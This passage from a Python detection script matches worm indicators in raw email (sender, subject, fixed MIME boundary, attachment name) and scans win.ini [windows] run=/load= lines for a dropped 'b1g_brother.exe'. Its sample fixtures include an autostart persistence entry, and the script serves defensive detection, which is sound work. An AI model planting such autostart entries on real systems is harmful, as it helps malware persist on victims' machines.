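    b"\r\n--a1234--\r\n"
)
SAMPLE_BENIGN_MAIL = (
    b"From: Alice <alice@example.org>\r\n"
    b"Subject: Big Brother show tonight\r\n"
    b"\r\n"
    b"See you at eight.\r\n"
)
SAMPLE_WIN_INI = (
    "[windows]\r\n"
    "load=\r\n"
    "run=c:\\Windows\\System\\b1g_brother.exe\r\n"
    "[fonts]\r\n"
    "run=ignored-outside-windows-section\r\n"
)


def match_message(raw):
    """Return the names of the indicators present in one raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    if IOC_FROM_ADDR in str(msg.get("From", "")).lower():
        hits.append("from")
    if str(msg.get("Subject", "")).strip().upper() == IOC_SUBJECT:
        hits.append("subject")
    if msg.get_boundary() == IOC_BOUNDARY:
        hits.append("boundary")
    for part in msg.walk():
        name = part.get_filename()
        if name and name.lower() == IOC_ATTACHMENT:
            hits.append("attachment")
            break
    return hits


def win_ini_hits(text):
    """Return run=/load= values in the [windows] section that name the dropped copy."""
    section = None
    found = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition("=")
        if section == "windows" and sep and key.strip().lower() in ("run", "load"):
            if IOC_DROPPED_NAME in value.lower():
                found.append(value.strip())
    return found


if __name__ == "__main__":
    print(match_message(SAMPLE_WORM_MAIL))
    print(match_message(SAMPLE_BENIGN_MAIL))
    print(win_ini_hits(SAMPLE_WIN_INI))
```

A single hit such as the subject alone is weak evidence; the fixed boundary string together with the attachment name is the more specific combination.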